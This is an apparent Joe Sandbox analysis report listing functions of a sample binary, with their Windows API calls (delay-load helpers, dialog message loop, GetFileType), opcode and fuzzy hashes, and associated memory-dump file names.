Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: 03977cf8a68d4f52a33b4e75cba876f0186452257aa08069ce4474f310612b3d
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: A7D0C771254609B6DF416B65CC12A6E7699EB01340F04C127B841D5351EAF1E9109572

Function 00DDE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 00DDE5E3

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: c65aa69ce1975c9b4e312a3fbf73da485957f84491db5bc35f09302c6ae20ee9
Instruction ID: a94a9b97af6f7cf94d558ea96ce03c18f8a9a2c68842a78b2f93d94fdeacb933
Opcode Fuzzy Hash: c65aa69ce1975c9b4e312a3fbf73da485957f84491db5bc35f09302c6ae20ee9
Instruction Fuzzy Hash: 83D0A9B82882409EC21AFBA8B8837143350F330B41F840193F245E9391CA608181C631

Function 00DDDD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00DD1B3E), ref: 00DDDD92

Part of subcall function 00DDB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DDB579
Part of subcall function 00DDB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DDB58A
Part of subcall function 00DDB568: IsDialogMessageW.USER32(00010466,?), ref: 00DDB59E
Part of subcall function 00DDB568: TranslateMessage.USER32(?), ref: 00DDB5AC
Part of subcall function 00DDB568: DispatchMessageW.USER32(?), ref: 00DDB5B6

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: b9a6901628b8cb57015bf661f25800d615c2de6e29678dfdc3c91e82cab2f07b
Instruction ID: f489fbf3ccd4b226aa3b8164ca5acaebe77d12ae09b655b1b678276ee81515a2
Opcode Fuzzy Hash: b9a6901628b8cb57015bf661f25800d615c2de6e29678dfdc3c91e82cab2f07b
Instruction Fuzzy Hash: E4D09E31144300BED6112B52DE06F0A7AA2EB88B08F404556B284740B286729D71DF25

Function 00DC98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,00DC97BE), ref: 00DC98C8

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: c0fa7a6f3ad3d58b24f0b1b0e5716d04d92da6025575bbeb68cd6c882e1e90c6
Instruction ID: be1dd16a73cc3dfa1bbe9f7de779d10f6e3477b8abf198fad1734df55547c277
Opcode Fuzzy Hash: c0fa7a6f3ad3d58b24f0b1b0e5716d04d92da6025575bbeb68cd6c882e1e90c6
Instruction Fuzzy Hash: 25C01234400207958E304A24985C595B711AE533657B887D9C028C70E1C322CC87EA20

Function 00DDE1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE1E3

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4b074ee1e4deb878a829800d2c6b190947adf0cb4fafd6b221fd866b0d7d803a
Instruction ID: 7f1857b9d8c5f7314b2f3480d9af0d0d3758548c29ebc74f8480ecf58ce5eca5
Opcode Fuzzy Hash: 4b074ee1e4deb878a829800d2c6b190947adf0cb4fafd6b221fd866b0d7d803a
Instruction Fuzzy Hash: F6B012D5369244BC310472552D03C37030CC0C1B20330D43FFC01D8681D840EC141C71

Function 00DDE1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE1E3

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 442cfdd59d93f891ee44415b99bd802906b8adb55d83262a24e52c3a797f7f5f
Instruction ID: 3e6cd41eaeb1622c74c6eb6f60fa26a77c7352763b9d178e2b7987c942970d49
Opcode Fuzzy Hash: 442cfdd59d93f891ee44415b99bd802906b8adb55d83262a24e52c3a797f7f5f
Instruction Fuzzy Hash: DBB012D1369144AC3104B3152D03C37030CC0C1B20330D13FFC05C8380D840EC181871

Function 00DDE1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE1E3

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bc5480a72522a1aae66a207137fab3b201f124c3788f31cd28bf5586c12f4041
Instruction ID: 0c2ccc34d66595eca89ce8305c1827fbc158db733628b4f7d783d1022b4ed75a
Opcode Fuzzy Hash: bc5480a72522a1aae66a207137fab3b201f124c3788f31cd28bf5586c12f4041
Instruction Fuzzy Hash: 1FB012D536D248AC3104B2592D03C37030CC0C0B20330903FF805C8381D840AC141D71

Function 00DDE282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE1E3

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ddffa8b0ae09b15ff0c652bd1b788ae166514817cae4faf40c434441e2351010
Instruction ID: 7fb9d108b58996a7794d3535c81429fdaad8becdafc378b0a64e7d7735205cc6
Opcode Fuzzy Hash: ddffa8b0ae09b15ff0c652bd1b788ae166514817cae4faf40c434441e2351010
Instruction Fuzzy Hash: 6BB012E1369154AC3104B2152E03C37038CC0C0B20330903FF805C8380DC40AD151871

Function 00DDE250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE1E3

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d88b840f2399b1381b0bfda890fe3bbe723b9c99758f1930e429726bb437e6ab
Instruction ID: 888795a563727ab9cf71c815d840006a3b2246f6d84facbd7ab7b7f1f9676aee
Opcode Fuzzy Hash: d88b840f2399b1381b0bfda890fe3bbe723b9c99758f1930e429726bb437e6ab
Instruction Fuzzy Hash: 19B012E136A284BC3144B3152D03C37030DC0C0B20330913FF805C8380D840AC581871

Function 00DDE246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE1E3

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 29544449634214411e1aea636ec6b4c6326ddea0add063b67f02f0d6bd8567a5
Instruction ID: d93ab04914fc5a765ad02120137ec289828a73c9152f1dea67f97bf80d9d45ae
Opcode Fuzzy Hash: 29544449634214411e1aea636ec6b4c6326ddea0add063b67f02f0d6bd8567a5
Instruction Fuzzy Hash: F2B012D136A184AC3104B2152D03C37030DC0C1B20330D03FFC05C8380D840EC541871

Function 00DDE26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE1E3

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3694d15e40054a61d3bfc566f1eabe889d074e7e39e27985296438c243bc8e16
Instruction ID: b8202c8a60d833dfc9b6ca71ba461f0863fdee2005971991e0632ff78945aa81
Opcode Fuzzy Hash: 3694d15e40054a61d3bfc566f1eabe889d074e7e39e27985296438c243bc8e16
Instruction Fuzzy Hash: 36B012D1369154AC3104B2252D03C37034CC0C1B20330D03FFD05C8380D840EC141871

Function 00DDE264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE1E3

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ac1c53da541762c71061fce7e7e75240f0c3accf4853713cb3e1affc568c7353
Instruction ID: a737f0dfa317889f013bc2283d3d3c345ab87bdf1c664eef91687e65c340262d
Opcode Fuzzy Hash: ac1c53da541762c71061fce7e7e75240f0c3accf4853713cb3e1affc568c7353
Instruction Fuzzy Hash: 94B012D177A184AC3104B2152D03C37034DC4C0B20330903FF806C8380D840AC141871

Function 00DDE21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE1E3

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e037caa873f63d61af156c8665c4f41dfcaecdbbc8cc9575178643266c19938c
Instruction ID: 96e9cb26fdc8842c4545cd22bd20fd428df345b5acf8b349f5019eb39a950b3b
Opcode Fuzzy Hash: e037caa873f63d61af156c8665c4f41dfcaecdbbc8cc9575178643266c19938c
Instruction Fuzzy Hash: 41B092E1269144AC2104A2152902C36020CC0C1B20320902BB905C82809840A9141871

Function 00DDE20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE1E3

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 32a311b8a18a4ead56f129007d1b5b9e7be13f32e49810368b894ff2c2e3b770
Instruction ID: 0ecd99faa8425c8bc3af9d748eba3379a1e45c8833518dc81c94191ebee519a7
Opcode Fuzzy Hash: 32a311b8a18a4ead56f129007d1b5b9e7be13f32e49810368b894ff2c2e3b770
Instruction Fuzzy Hash: 72B012D1369144AC3104B3152E03C37030CC0C0B20330D13FF805D8380DC50AD1D1871

Function 00DDE200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE1E3

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4e4607fb1d72bb07fa40d1e3dbf3c4509a4a788a54e65f402fd237a1135c33bd
Instruction ID: fa3f6c0e45c5b625bc9975058a3b373d4065caf57eab7f31c9f29023d566fefc
Opcode Fuzzy Hash: 4e4607fb1d72bb07fa40d1e3dbf3c4509a4a788a54e65f402fd237a1135c33bd
Instruction Fuzzy Hash: 17B012D1369284BC3144B3152D03C37030CC0C0B20330D23FF805C8380D840AC581871

Function 00DDE23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE1E3

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a715890d880553dbe39dd1d515308d3f558433bc3c3d8bc74bdde70da67e9a58
Instruction ID: e3ebca7441bc3b30d6a17000ddeae26764d2309af8197329a747e1686c1626c8
Opcode Fuzzy Hash: a715890d880553dbe39dd1d515308d3f558433bc3c3d8bc74bdde70da67e9a58
Instruction Fuzzy Hash: 76B012E1369144AC3104B2162D03C37030CC0C0F20330903FF905C8380DC40AD141871

Function 00DDE232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE1E3

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 175cbf57921218ac96c3a84e130957f930da2d1a087961d83f2e074277530144
Instruction ID: bc53814c3dd85eb045bb773837cd6d7630403d0fe32e63376023b88a7fb449c2
Opcode Fuzzy Hash: 175cbf57921218ac96c3a84e130957f930da2d1a087961d83f2e074277530144
Instruction Fuzzy Hash: DEB012E1369144AC3104B2152E03C37030CC0C0F20330903FF905C8380DC40AE151871

Function 00DDE228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE1E3

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
